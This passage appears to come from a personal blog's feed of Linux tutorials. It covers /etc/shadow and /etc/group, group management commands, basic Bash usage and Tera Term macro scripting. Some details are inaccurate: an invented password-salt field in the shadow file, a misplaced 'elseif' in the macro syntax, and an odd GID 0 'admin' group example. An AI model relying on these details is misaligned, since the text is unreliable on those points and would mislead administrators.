<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696488177587/ee33a692-52ee-4f05-9c12-adaed70f115e.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p><strong>Username:</strong> The name of the user account.</p>
</li>
<li><p><strong>Password hash:</strong> The one-way transformation of the user's password.</p>
</li>
<li><p><strong>Last password change:</strong> The date on which the user's password was last changed, in days since January 1, 1970.</p>
</li>
<li><p><strong>Minimum password age:</strong> The minimum number of days that a user must keep their password before they can change it.</p>
</li>
<li><p><strong>Maximum password age:</strong> The maximum number of days that a user can keep their password before they must change it.</p>
</li>
<li><p><strong>Password inactive days:</strong> The number of days that a user's account will be locked if they do not change their password before the expiration date.</p>
</li>
<li><p><strong>Account expiry date:</strong> The date on which the user's account will expire.</p>
</li>
<li><p><strong>Reserved field:</strong> This field is currently unused.</p>
</li>
<li><p><strong>Encrypted password salt:</strong> This field is used to add randomness to the password hash.</p>
</li>
</ul>
<p>The password hash field is the most important field in the <code>/etc/shadow</code> file. It is used to authenticate the user when they log in.</p>
<p>The other fields in the file are used to control password aging and account lockout policies. These policies can help to prevent unauthorized access to the system by making it more difficult for attackers to guess or steal user passwords.</p>
<p>The <code>/etc/shadow</code> file is owned by the root user and has permissions of 0600. This means that only the root user can read or write to the file. This helps to protect the file from unauthorized access.</p>
<h1 id="heading-user-group">User group</h1>
<p>A user group in Linux is a collection of users who share common access privileges. Each group has a unique Group ID (GID) that is used to identify the group to the system and determine the group's permissions and privileges.</p>
<p>User groups are important because they make it easier to manage access control. By assigning users to groups, you can grant them specific permissions and privileges without having to manually configure permissions for each individual user.</p>
<h1 id="heading-how-to-create-manage-and-delete-user-groups-in-linux"><strong>How to create, manage, and delete user groups in Linux</strong></h1>
<p>To create a new user group in Linux, you can use the <code>groupadd</code> command. For example, to create a group called <code>developers</code>, you would run the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> groupadd developers
</code></pre>
<p>To add a user to a group, you can use the <code>usermod</code> command. For example, to add the user <code>nguyenducchinh</code> to the <code>developers</code> group, you would run the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> usermod -aG developers nguyenducchinh
</code></pre>
<p>To remove a user from a group, you can use the <code>gpasswd</code> command. For example, to remove the user <code>nguyenducchinh</code> from the <code>developers</code> group, you would run the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> gpasswd -d nguyenducchinh developers
</code></pre>
<p>To delete a user group, you can use the <code>groupdel</code> command. For example, to delete the <code>developers</code> group, you would run the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sudo</span> groupdel developers
</code></pre>
<p>Here are some examples of common user groups in Linux:</p>
<ul>
<li><p><code>admin</code>: The administrator group. Users in this group have full administrative privileges.</p>
</li>
<li><p><code>root</code>: The root user group. The root user is the most powerful user on the system and has unrestricted access to all files and resources.</p>
</li>
<li><p><code>sudo</code>: The sudo group. Users in this group can run commands with root privileges.</p>
</li>
<li><p><code>developer</code>: The developer group. Users in this group typically have access to development tools and resources.</p>
</li>
<li><p><code>qa</code>: The quality assurance group. Users in this group typically have access to testing tools and resources.</p>
</li>
<li><p><code>ops</code>: The operations group. Users in this group typically have access to production systems and resources.</p>
</li>
</ul>
<p>You can also create your own custom user groups to meet the specific needs.</p>
<h1 id="heading-understand-etcgroup-file">Understand /etc/group file</h1>
<p>he <code>/etc/group</code> file is a text file that contains information about the user groups on a Linux system. Each line in the file represents a single group, and the fields are separated by a colon.</p>
<pre><code class="lang-haskell"><span class="hljs-title">group_name</span>:password:<span class="hljs-type">GID</span>:user_list
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1696489672390/d131d616-b69b-4616-8294-7b78fc9cca7a.png" alt class="image--center mx-auto" /></p>
<ul>
<li><strong>group_name:</strong> The name of the group.</li>
</ul>
<ul>
<li><p><strong>password:</strong> The group password. This is optional and is not typically used.</p>
</li>
<li><p><strong>GID:</strong> The group ID (GID). This is a unique number that identifies the group to the system.</p>
</li>
<li><p><strong>user_list:</strong> A list of users who belong to the group, separated by commas.</p>
</li>
</ul>
<p>For example, the following line in the <code>/etc/group</code> file represents the <code>admin</code> group:</p>
<pre><code class="lang-haskell"><span class="hljs-title">admin</span>::<span class="hljs-number">0</span>:root,wheel
</code></pre>
<p>This line indicates that the <code>admin</code> group has GID 0, and that the users <code>root</code> and <code>wheel</code> are members of the group.</p>
<h1 id="heading-best-practices-for-user-management"><strong>Best practices for user management</strong></h1>
<ul>
<li><p><strong>Use strong passwords:</strong> Users should be required to use strong passwords that are difficult to guess.</p>
</li>
<li><p><strong>Limit user permissions:</strong> Users should only be given the permissions they need to perform their job duties.</p>
</li>
<li><p><strong>Regularly audit user accounts:</strong> System administrators should regularly audit user accounts to ensure that they are still necessary and that permissions are assigned appropriately.</p>
</li>
<li><p><strong>Delete unused user accounts:</strong> Unused user accounts should be deleted to reduce the attack surface of the system.</p>
</li>
</ul>
<h1 id="heading-conclusion"><strong>Conclusion</strong></h1>
<p>User management is an important part of Linux security. By understanding how it works and how to protect it, you can help to keep your system and your data safe.</p>
]]></content:encoded></item><item><title><![CDATA[Find your way around the Linux terminal]]></title><description><![CDATA[What is the Linux command line?
The Linux command line is a text-based interface that allows you to interact with the operating system. It is a lot like the DOS prompt in Windows, but it is much more powerful.
There are several different shells on Li...]]></description><link>https://chinhnd.org/find-your-way-around-the-linux-terminal</link><guid isPermaLink="true">https://chinhnd.org/find-your-way-around-the-linux-terminal</guid><category><![CDATA[Linux]]></category><category><![CDATA[linux for beginners]]></category><category><![CDATA[linux-basics]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 14 Sep 2023 09:17:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/TVxYoWzqdjs/upload/74cebf557408f11b8664f9c0ed624117.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-is-the-linux-command-line"><strong>What is the Linux command line?</strong></h1>
<p>The Linux command line is a text-based interface that allows you to interact with the operating system. It is a lot like the DOS prompt in Windows, but it is much more powerful.</p>
<p>There are several different shells on Linux, these are just a few popular ones:</p>
<ul>
<li><p>Bourne-again shell (Bash)</p>
</li>
<li><p>C shell (csh or tcsh, the enhanced csh)</p>
</li>
<li><p>Korn shell (ksh)</p>
</li>
<li><p>Z shell (zsh)</p>
</li>
</ul>
<p>On Linux, the most common one is the Bash shell. We will mainly focus on Bash in this series.</p>
<p>To access the Linux command line, open a terminal window. On most Linux distributions, you can do this by pressing Ctrl+Alt+T shortcut.</p>
<p>Once you are in the terminal window, you can start typing commands.</p>
<h1 id="heading-root-and-non-root-shell">Root and non-root shell</h1>
<p>The main difference between root and non-root shells is the level of privileges they have. The root shell has full access to the system, while the non-root shell has limited access.</p>
<p>The easiest way to tell if you are in a root shell or a non-root shell is to look at the prompt. The prompt for a root shell starts with a number sign (<code>#</code>), while the prompt for a non-root shell starts with a dollar sign (<code>$</code>).</p>
<p>On Ubuntu or Debian GNU/Linux, the prompt for a regular user will likely look like this:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$
</code></pre>
<p>If you are logged in as root, your prompt will look like this:</p>
<pre><code class="lang-bash">root@VM:~<span class="hljs-comment">#</span>
</code></pre>
<p>You can also use the <code>whoami</code> command to check your current user ID.</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ whoami
nguyenducchinh
</code></pre>
<p>If you are logged in as root, the output of the <code>whoami</code> command will be <code>root</code>.</p>
<pre><code class="lang-bash">root@VM:~<span class="hljs-comment"># whoami</span>
root
</code></pre>
<p>It is important to note that the root shell can be dangerous if used incorrectly. For this reason, it is important to only use the root shell when necessary and to take precautions to avoid making mistakes.</p>
<h1 id="heading-structure-of-a-linux-command">Structure of a Linux command</h1>
<p>The structure of a Linux command is as follows:</p>
<pre><code class="lang-bash">~$ <span class="hljs-built_in">command</span> [options] [arguments]
</code></pre>
<ul>
<li><p><strong>Command:</strong> The command is the name of the program or function that you want to run.</p>
</li>
<li><p><strong>Options:</strong> Options are modifiers that can be used to change the behavior of the command.</p>
</li>
<li><p><strong>Arguments:</strong> Arguments are the data that the command needs to work.</p>
</li>
</ul>
<p>In the below case, <code>filename</code> is the argument needed to specify which file you will delete.</p>
<pre><code class="lang-bash">~$ rm filename
</code></pre>
<p>Some commands can accept multiple arguments.</p>
<pre><code class="lang-bash">~$ rm filename1 filename2 filename3
</code></pre>
<p>Here are some acceptable options you can add for <code>rm</code>:</p>
<ul>
<li><p><strong>-i</strong> prompts system confirmation before deleting a file.</p>
</li>
<li><p><strong>-f</strong> allows the system to remove without a confirmation.</p>
</li>
<li><p><strong>-r</strong> deletes files and directories recursively.</p>
</li>
</ul>
<p>Options can be accessed in a short and a long form. For example, <code>-l</code> is identical to <code>--format=long</code> and <code>-a</code> is the same as <code>--all</code>.</p>
<p>Multiple options can be combined as well and for the short form, the letters can usually be typed together. For example, the following commands all do the same:</p>
<pre><code class="lang-bash">~$ ls -la 
~$ ls -l -a
~$ ls --format=long --all
</code></pre>
<h1 id="heading-variables">Variables</h1>
<p>In Linux shell, a variable is a named location in memory that can be used to store data. Variables can be used to store text, numbers, or other types of data.</p>
<h2 id="heading-local-variables">Local Variables</h2>
<p>To declare a local variable you use the following syntax:</p>
<pre><code class="lang-bash">~$ variable_name=value
</code></pre>
<p>For example, the following command declares a variable called <code>my_variable</code> and assigns it the value <code>123</code>:</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ my_variable=123
</code></pre>
<p>Once a variable has been declared, you can use it in commands by preceding its name with a dollar sign ($). You can display any variable using the <code>echo</code> command.</p>
<pre><code class="lang-bash">nguyenducchinh@VM:~$ <span class="hljs-built_in">echo</span> <span class="hljs-variable">$my_variable</span>
123
</code></pre>
<p>To remove a variable, use the command <code>unset</code>:</p>
<pre><code class="lang-bash">clayton@VM:~$ <span class="hljs-built_in">unset</span> my_variable
clayton@VM:~$ <span class="hljs-built_in">echo</span> <span class="hljs-variable">$my_variable</span>

clayton@VM:~$
</code></pre>
<p>The problem is, that when you open another terminal window, this variable is not accessible.</p>
<p>Local variables only work in the instance they were declared. If want to access it across the shell environment, you need to turn it into a global variable.</p>
<h2 id="heading-global-variables">Global Variables</h2>
<p>Turning local to global variables is done by the command <code>export</code>. When it is invoked with the variable name, this variable is added to the shell’s environment:</p>
<pre><code class="lang-bash">clayton@VM:~$ greeting=hello
clayton@VM:~$ <span class="hljs-built_in">export</span> greeting
</code></pre>
<h2 id="heading-the-path-variable">The <code>PATH</code> Variable</h2>
<p>The <code>PATH</code> variable is a colon-separated list of directories that tells the shell where to look for executable programs. When you type a command in the shell, the shell searches the directories in the PATH variable for an executable file with the same name.</p>
<pre><code class="lang-bash">clayton@VM:~$ <span class="hljs-built_in">echo</span> <span class="hljs-variable">$PATH</span>
/usr/<span class="hljs-built_in">local</span>/sbin:/usr/<span class="hljs-built_in">local</span>/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/<span class="hljs-built_in">local</span>/games:/snap/bin:/snap/bin
clayton@VM:~$
</code></pre>
<p>Let's say you have an executable file called <code>my_script.sh</code> in your <code>/home</code> directory. By default, the shell will not be able to find this file, because it is not in one of the directories in the PATH variable.</p>
<p>To make the shell find this file, you can add the home directory to the PATH variable. You can do this by editing your shell configuration file, typically <code>~/.bashrc</code> or <code>~/.profile</code>. In the file, add the following line:</p>
<pre><code class="lang-bash">PATH=<span class="hljs-variable">$HOME</span>/bin:<span class="hljs-variable">$PATH</span>
</code></pre>
<p>This will tell the shell to look for executable files in the home directory, in addition to the directories that are already in the PATH variable.</p>
<p>If you don't want to edit can also set the <code>PATH</code> variable temporarily by using the <code>export</code> command.</p>
<p>Now, you can run the <code>my_script.sh</code> file by just typing the following command:</p>
<pre><code class="lang-bash">clayton@VM:~$ my_script.sh
</code></pre>
<p>The shell will find the file in the home directory and execute it.</p>
<p>By setting the <code>PATH</code> variable to include the directories where your executable files are located, you can avoid having to type the full path to the file every time you want to run it.</p>
<h1 id="heading-most-used-linux-commands"><strong>M</strong>ost used <strong>Linux commands</strong></h1>
<p>Here are some of the top Linux commands frequently used by developers and system administrators:</p>
<h3 id="heading-1-ls-list-directory-contents">1. <code>ls</code> – List directory contents</h3>
<ul>
<li>Displays files and directories in the current directory.</li>
</ul>
<pre><code class="lang-bash">$ ls -l
total 32
drwxr-xr-x 2 user user 4096 Sep 22 10:00 Documents
drwxr-xr-x 3 user user 4096 Sep 21 09:00 Downloads
-rw-r--r-- 1 user user  614 Sep 22 11:00 example.txt
</code></pre>
<h3 id="heading-2-cd-change-directory">2. <code>cd</code> – Change directory</h3>
<ul>
<li>Used to navigate between directories.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">cd</span> Documents
</code></pre>
<h3 id="heading-3-pwd-print-working-directory">3. <code>pwd</code> – Print working directory</h3>
<ul>
<li>Displays the current directory you are in.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">pwd</span>
/home/user/Documents
</code></pre>
<h3 id="heading-4-cp-copy-files-or-directories">4. <code>cp</code> – Copy files or directories</h3>
<ul>
<li><p>Copies files from one location to another.</p>
</li>
<li><p>Example: <code>cp file.txt /path/to/destination</code></p>
</li>
</ul>
<pre><code class="lang-bash">$ cp example.txt backup.txt
</code></pre>
<h3 id="heading-5-mv-move-or-rename-files">5. <code>mv</code> – Move or rename files</h3>
<ul>
<li>Moves or renames files or directories.</li>
</ul>
<pre><code class="lang-bash">$ mv example.txt example_old.txt
</code></pre>
<h3 id="heading-6-rm-remove-files-or-directories">6. <code>rm</code> – Remove files or directories</h3>
<ul>
<li><p>Deletes files or directories.</p>
</li>
<li><p>Example: <code>rm file.txt</code> (use <code>rm -r</code> for directories)</p>
</li>
</ul>
<pre><code class="lang-bash">$ rm example_old.txt
</code></pre>
<h3 id="heading-7-touch-create-an-empty-file">7. <code>touch</code> – Create an empty file</h3>
<ul>
<li>Creates an empty file or updates the timestamp of an existing file.</li>
</ul>
<pre><code class="lang-bash">$ touch newfile.txt
</code></pre>
<h3 id="heading-8-mkdir-make-a-directory">8. <code>mkdir</code> – Make a directory</h3>
<ul>
<li>Creates a new directory.</li>
</ul>
<pre><code class="lang-bash">$ mkdir newfolder
</code></pre>
<h3 id="heading-9-rmdir-remove-directory">9. <code>rmdir</code> – Remove directory</h3>
<ul>
<li>Deletes an empty directory.</li>
</ul>
<pre><code class="lang-bash">$ rmdir newfolder
</code></pre>
<h3 id="heading-10-cat-concatenate-and-display-file-content">10. <code>cat</code> – Concatenate and display file content</h3>
<ul>
<li>Displays the content of a file.</li>
</ul>
<pre><code class="lang-bash">$ cat example.txt
This is an example file.
</code></pre>
<h3 id="heading-11-grep-search-text-using-patterns">11. <code>grep</code> – Search text using patterns</h3>
<ul>
<li><p>Searches for a pattern in files.</p>
</li>
<li><p>Example: <code>grep "search_text" file.txt</code></p>
</li>
</ul>
<pre><code class="lang-bash">$ grep <span class="hljs-string">"example"</span> example.txt
This is an example file.
</code></pre>
<h3 id="heading-12-find-search-for-files-or-directories">12. <code>find</code> – Search for files or directories</h3>
<ul>
<li>Searches for files based on name, type, or other attributes.</li>
</ul>
<pre><code class="lang-bash">$ find /home/user -name <span class="hljs-string">"*.txt"</span>
/home/user/Documents/example.txt
</code></pre>
<h3 id="heading-13-chmod-change-file-permissions">13. <code>chmod</code> – Change file permissions</h3>
<ul>
<li>Modifies the permissions of a file or directory.</li>
</ul>
<pre><code class="lang-bash">$ chmod 755 script.sh
</code></pre>
<h3 id="heading-14-chown-change-file-owner-and-group">14. <code>chown</code> – Change file owner and group</h3>
<ul>
<li>Changes the owner or group of a file.</li>
</ul>
<pre><code class="lang-bash">$ chown user:group file.txt
</code></pre>
<h3 id="heading-15-top-display-active-processes">15. <code>top</code> – Display active processes</h3>
<ul>
<li>Shows real-time system processes, CPU, and memory usage.</li>
</ul>
<pre><code class="lang-bash">$ top
</code></pre>
<p>(You’ll see an interactive display of processes.)</p>
<h3 id="heading-16-ps-report-process-status">16. <code>ps</code> – Report process status</h3>
<ul>
<li>Displays currently running processes.</li>
</ul>
<pre><code class="lang-bash">$ ps aux
</code></pre>
<ul>
<li>Output:</li>
</ul>
<pre><code class="lang-sql">USER       PID %CPU %MEM    VSZ   RSS TTY      STAT <span class="hljs-keyword">START</span>   <span class="hljs-built_in">TIME</span> COMMAND
<span class="hljs-keyword">user</span>      <span class="hljs-number">1234</span>  <span class="hljs-number">0.1</span>  <span class="hljs-number">1.2</span> <span class="hljs-number">123456</span> <span class="hljs-number">12345</span> ?        Ssl  <span class="hljs-number">10</span>:<span class="hljs-number">00</span>   <span class="hljs-number">0</span>:<span class="hljs-number">01</span> /usr/<span class="hljs-keyword">bin</span>/python3
</code></pre>
<h3 id="heading-17-kill-terminate-a-process">17. <code>kill</code> – Terminate a process</h3>
<ul>
<li>Kills processes by process ID.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">kill</span> 1234
</code></pre>
<h3 id="heading-18-df-disk-space-usage">18. <code>df</code> – Disk space usage</h3>
<ul>
<li>Shows available disk space on file systems.</li>
</ul>
<pre><code class="lang-bash">$ df -h
</code></pre>
<ul>
<li>Output:</li>
</ul>
<pre><code class="lang-sql">system      Size  Used Avail <span class="hljs-keyword">Use</span>% Mounted <span class="hljs-keyword">on</span>
/dev/sda1       <span class="hljs-number">100</span>G   <span class="hljs-number">60</span>G   <span class="hljs-number">40</span>G  <span class="hljs-number">60</span>% /
</code></pre>
<h3 id="heading-19-du-disk-usage">19. <code>du</code> – Disk usage</h3>
<ul>
<li>Shows the size of directories and files.</li>
</ul>
<pre><code class="lang-bash">$ du -sh *
</code></pre>
<ul>
<li>Output:</li>
</ul>
<pre><code class="lang-sql">5.0M    Documents
10M     Downloads
</code></pre>
<h3 id="heading-20-tar-archive-files">20. <code>tar</code> – Archive files</h3>
<ul>
<li>Archives and compresses files.</li>
</ul>
<pre><code class="lang-bash">$ tar -czvf archive.tar.gz /path/to/folder
</code></pre>
<h3 id="heading-21-wget-download-files-from-the-web">21. <code>wget</code> – Download files from the web</h3>
<ul>
<li>Downloads files from a URL.</li>
</ul>
<pre><code class="lang-bash">$ wget https://example.com/file.zip
</code></pre>
<h3 id="heading-22-curl-transfer-data-from-or-to-a-server">22. <code>curl</code> – Transfer data from or to a server</h3>
<ul>
<li>Used to make network requests and download files.</li>
</ul>
<pre><code class="lang-bash">$ curl https://example.com
</code></pre>
<h3 id="heading-23-man-manual-pages-for-commands">23. <code>man</code> – Manual pages for commands</h3>
<ul>
<li>Displays the manual for a command.</li>
</ul>
<pre><code class="lang-bash">$ man ls
</code></pre>
<h3 id="heading-24-echo-display-a-line-of-text">24. <code>echo</code> – Display a line of text</h3>
<ul>
<li>Outputs text or variables.</li>
</ul>
<pre><code class="lang-bash">$ <span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello World"</span>
Hello World
</code></pre>
<h3 id="heading-25-sudo-execute-commands-with-superuser-privileges">25. <code>sudo</code> – Execute commands with superuser privileges</h3>
<ul>
<li>Runs commands as the root user or another user.</li>
</ul>
<pre><code class="lang-bash">$ sudo apt update
</code></pre>
<h1 id="heading-conclusion"><strong>Conclusion</strong></h1>
<p>These are just the essentials of Linux command line that you should know. With these, you will be able to do basic file management, navigate the file system, and run programs.</p>
]]></content:encoded></item><item><title><![CDATA[Automate your terminal with Tera Term Macro]]></title><description><![CDATA[What are Tera Term and Teraterm Macro?
Tera Term is a terminal emulator software that is free and open-source. It supports Serial, TCP/IP, and named pipe connections. Tera Term Macro is a scripting language that comes with Tera Term.
It allows you to...]]></description><link>https://chinhnd.org/automate-your-terminal-with-tera-term-macro</link><guid isPermaLink="true">https://chinhnd.org/automate-your-terminal-with-tera-term-macro</guid><category><![CDATA[automation]]></category><category><![CDATA[networking]]></category><category><![CDATA[teraterm]]></category><dc:creator><![CDATA[Nguyen Duc Chinh]]></dc:creator><pubDate>Thu, 31 Aug 2023 04:46:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/stock/unsplash/p1m4B-lhS9Y/upload/5290ab9103a7552978515b48a0081d4c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-what-are-tera-term-and-teraterm-macro">What are Tera Term and Teraterm Macro?</h1>
<p>Tera Term is a terminal emulator software that is free and open-source. It supports Serial, TCP/IP, and named pipe connections. Tera Term Macro is a scripting language that comes with Tera Term.</p>
<p>It allows you to automate various tasks that you can do with a terminal, such as auto-login, auto-logging, auto-configuration, monitoring, and more.</p>
<p>Tera Term language (TTL) is the language used for writing macros. You can find the documentation at <a target="_blank" href="https://ttssh2.osdn.jp/manual/4/en/macro/">MACRO Help Index</a>. You can use any text editor to create your macros.</p>
<p>In this article, I will show you how to use TTL to automate anything that needs a terminal input.</p>
<h1 id="heading-connect-to-a-remote-host">Connect to a Remote host</h1>
<p>To begin working with TTL, you have to connect to a remote host first.</p>
<p>To connect to a serial port, you can:</p>
<pre><code class="lang-markdown">;Set the COM5 port
connect '/C=5'
</code></pre>
<p>Here is an example of how to SSH to a host using the password method:</p>
<pre><code class="lang-markdown">connect 'myserver /ssh /auth=password /user=username /passwd=password'
</code></pre>
<p>This code snippet connects to a remote host using SSH connection (port 22). You can replace <code>myserver</code> with the IP address or hostname of the remote host.</p>
<ul>
<li><p>The <code>/auth=password</code> parameter is used to indicate using the password method.</p>
</li>
<li><p>The <code>/user=username</code> parameter is used to specify the username.</p>
</li>
<li><p>The <code>/passwd=password</code> parameter is used to specify the password.</p>
</li>
</ul>
<p>Here is an example of how to connect to SSH using public key method:</p>
<pre><code class="lang-markdown">connect 'myserver /ssh /auth=publickey /user=username /keyfile=private-key-file'
</code></pre>
<p>The <code>/auth=publickey</code> parameter is used to indicate that we are using public key authentication.</p>
<ul>
<li><p>The <code>/user=username</code> parameter is used to specify the username.</p>
</li>
<li><p>The <code>/keyfile=private-key-file</code> parameter is used to specify the private key file.</p>
</li>
</ul>
<p>You can find more information about other options for connecting to SSH using Tera Term macro in the <a target="_blank" href="https://ttssh2.osdn.jp/manual/4/en/usage/ssh.html">Tera Term documentation</a>.</p>
<p>After connecting to the remote host, you can then execute your automation script.</p>
<h1 id="heading-variables">Variables</h1>
<p>There are two types of variables:</p>
<ul>
<li><p>Strings (limited to 255 characters)</p>
</li>
<li><p>Integers (Limited to ~ +/-2 billion)</p>
</li>
</ul>
<p>To create a variable in TTL, you can use the following syntax:</p>
<pre><code class="lang-haskell"><span class="hljs-title">set</span> &lt;variable_name&gt; = &lt;value&gt;
</code></pre>
<p>For example, to create a variable named my_var and assign it the value 123, you can use the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">set</span> my_var=<span class="hljs-number">123</span>
</code></pre>
<p>You can then use this variable in your macro by enclosing it in <code>%</code> symbols. For example, to display the value of <code>my_var</code>, you can use the following command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">messagebox</span> <span class="hljs-string">"%my_var%"</span>
</code></pre>
<p>This will display a message box with the value of my_var (which is 123 in this case).</p>
<h1 id="heading-user-input"><strong>User input</strong></h1>
<p>To get user input in Tera Term Macro, you can use the <code>input</code> command. Here is an example of how to use the <code>input</code> command:</p>
<pre><code class="lang-haskell"><span class="hljs-title">input</span> '<span class="hljs-type">Enter</span> your name: ' <span class="hljs-type">Name</span>
<span class="hljs-title">print</span> '<span class="hljs-type">Hello</span>, ' + <span class="hljs-type">Name</span> + '!'
</code></pre>
<p>This code snippet prompts the user to enter their name and stores the input in the variable <code>Name</code>. Then it outputs the text "Hello, " followed by the value of <code>Name</code> and the exclamation mark to the terminal.</p>
<h1 id="heading-special-statements">Special Statements</h1>
<p>Tera Term Macro has many special statements that you can use to control Tera Term and automate your tasks.</p>
<p>Some of the special statements include <code>wait</code>, <code>sendln</code>, <code>connect</code>, <code>input</code>, <code>print</code>, <code>if</code>, <code>goto</code>, <code>label</code>, and more. You can find more information about these special statements in the <a target="_blank" href="https://ttssh2.osdn.jp/manual/4/en/">Tera Term documentation</a>.</p>
<p>I will introduce you to some of the most commonly used special statements and how to use them.</p>
<h2 id="heading-wait-and-sendln">wait and sendln</h2>
<p>Some of the unique features of Tera Term are <code>wait</code> and <code>send/sendln</code> .</p>
<p>The <code>wait</code> statement reads through all of the terminal output and when one of the strings is found, it sets the result to the index of that string and moves on.</p>
<p>This can be useful to wait for a password prompt or wait for the result of the command.</p>
<p>A nice addition to the <code>wait</code> command is the <code>sendln</code> and <code>send</code> commands. These do what their names suggest: they write out commands to the terminal (with <code>sendln</code> adding a new line at the end).</p>
<p>For example, I can log in to my network device and then execute some commands without entering my password.</p>
<pre><code class="lang-haskell">;<span class="hljs-type">Set</span> the <span class="hljs-type">COM5</span> port
<span class="hljs-title">connect</span> '/<span class="hljs-type">C</span>=<span class="hljs-number">5</span>'

;<span class="hljs-type">Set</span> the username and password's prompt and value
<span class="hljs-type">UsernamePrompt</span> = 'login:'
<span class="hljs-type">PasswordPrompt</span> = '<span class="hljs-type">Password</span>:'

;<span class="hljs-type">Set</span> credentials value
<span class="hljs-type">Username</span> ='admin'
<span class="hljs-type">Password</span> = 'mypasword'

;<span class="hljs-type">Set</span> the command to execute after
<span class="hljs-type">Command</span> = 'show interface description'

;<span class="hljs-type">Wait</span> for the <span class="hljs-type">UsernamePrompt</span>
<span class="hljs-title">wait</span> <span class="hljs-type">UsernamePrompt</span>
;input <span class="hljs-type">Username</span> here <span class="hljs-keyword">if</span> <span class="hljs-type">UsernamePrompt</span> is received
<span class="hljs-title">sendln</span> <span class="hljs-type">Username</span>

;<span class="hljs-type">Wait</span> for the <span class="hljs-type">PasswordPrompt</span>
<span class="hljs-title">wait</span> <span class="hljs-type">PasswordPrompt</span>
;input <span class="hljs-type">Password</span> here <span class="hljs-keyword">if</span> <span class="hljs-type">PasswordPrompt</span> is received
<span class="hljs-title">sendln</span> <span class="hljs-type">Password</span>
</code></pre>
<p>This code snippet waits for a certain word and if the word is found then execute a command. The <code>sendln</code> command sends characters followed by a new-line character to the host.</p>
<p>With these two statements, you can send in a command, wait for the result, then execute another command. You can do pretty much anything that usually requires manual input from the terminal.</p>
<h2 id="heading-strconcat-and-sprintf2">strconcat and sprintf2</h2>
<p><code>strconcat</code> is a command in Tera Term macro that appends a copy of a string to the end of a string variable. For example:</p>
<pre><code class="lang-haskell"><span class="hljs-title">filename</span> = <span class="hljs-string">"C:\\teraterm\\"</span>
<span class="hljs-title">strconcat</span> filename 'test.txt'
</code></pre>
<p>In the beginning, <code>filename</code> with the value <code>C:\\teraterm\\</code>, you can append <code>test.txt</code> to it using the <code>strconcat</code> command. The resulting value of <code>filename</code> would be <code>C:\\teraterm\\test.txt</code></p>
<p><code>sprintf2</code> is another command in Tera Term macro that returns formatted output. It works similarly to the <code>sprintf</code> command but with more options. The output string is stored in the string variable. For example:</p>
<pre><code class="lang-haskell"><span class="hljs-title">sprintf2</span> var \<span class="hljs-string">"%s/ USER NAME:%s\" '192.168.1.1' 'test user'</span>
</code></pre>
<p>The above command formats the <code>var</code> to <code>192.168.1.1/ USER NAME:test user</code> by replacing the <code>%s</code> with the strings after it. This works kind of the same with popular programming languages like C or Powershell.</p>
<h2 id="heading-conditional-statements">Conditional statements</h2>
<p>TTL supports conditional statements such as <code>if</code>, <code>then</code>, <code>elseif</code>, <code>else</code>, <code>endif</code>.</p>
<p>Here is how you can create a <code>if/else</code> statement in TTL:</p>
<pre><code class="lang-haskell"><span class="hljs-title">if</span> &lt;expression&gt; <span class="hljs-keyword">then</span>
  &lt;statement&gt;
<span class="hljs-title">else</span>
  &lt;statement&gt;
<span class="hljs-title">elseif</span>
  &lt;statement&gt;
<span class="hljs-title">endif</span>
</code></pre>
<p>If the condition is true, the following <code>if</code> commands are executed. Otherwise, the following the <code>else</code> commands are executed.</p>
<h2 id="heading-loop-statements">Loop statements</h2>
<p>To use loop statements in Tera Term Macro, you can use the <code>do</code>, <code>while</code>, <code>until</code>, <code>for</code>, and <code>next</code> commands</p>
<h3 id="heading-while">while</h3>
<p>Here is how you can create a <code>while</code> statement in TTL:</p>
<pre><code class="lang-haskell"><span class="hljs-title">while</span> &lt;condition&gt;
    &lt;command&gt;
<span class="hljs-title">endwhile</span>
</code></pre>
<p>The following the while keyword is executed repeatedly as long as the condition is true.</p>
<h3 id="heading-goto">goto</h3>
<p>To use <code>goto</code> in Tera Term Macro, you need to define a label using the <code>label</code> command.</p>
<p>Here is an example of how to use <code>goto</code> in Tera Term Macro:</p>
<pre><code class="lang-haskell"><span class="hljs-title">label</span> start
<span class="hljs-title">input</span> '<span class="hljs-type">Enter</span> your age: ' <span class="hljs-type">Age</span>
<span class="hljs-title">if</span> <span class="hljs-type">Age</span>= ''
   goto start
<span class="hljs-title">endif</span>
</code></pre>
<p>This code snippet defines a label called start. It prompts the user to enter their name and stores the input in the variable Age.</p>
<p>If the value of Age is empty, it will jump back to the label start.</p>
<h3 id="heading-for-and-next">for and next</h3>
<p>They repeat commands between <code>for</code> and <code>next</code> until the integer variable has the value at the <code>next</code> statement. After each loop the integer variable increases by 1.</p>
<p>Here is an example:</p>
<pre><code class="lang-haskell"><span class="hljs-title">for</span> i = <span class="hljs-number">1</span> to <span class="hljs-number">10</span>
  send <span class="hljs-string">"Hello World"</span>
<span class="hljs-title">next</span> i
</code></pre>
<h3 id="heading-do-and-loop">do and loop</h3>
<p>One of the more difficult statements to understand is <code>do</code> and <code>loop</code> . They repeat the commands between them according to the conditions as follows:</p>
<ul>
<li><p>If <code>while</code> is specified, repeats while is non-zero.</p>
</li>
<li><p>If <code>until</code> is specified, repeats while is zero.</p>
</li>
</ul>
<p>Here is an example:</p>
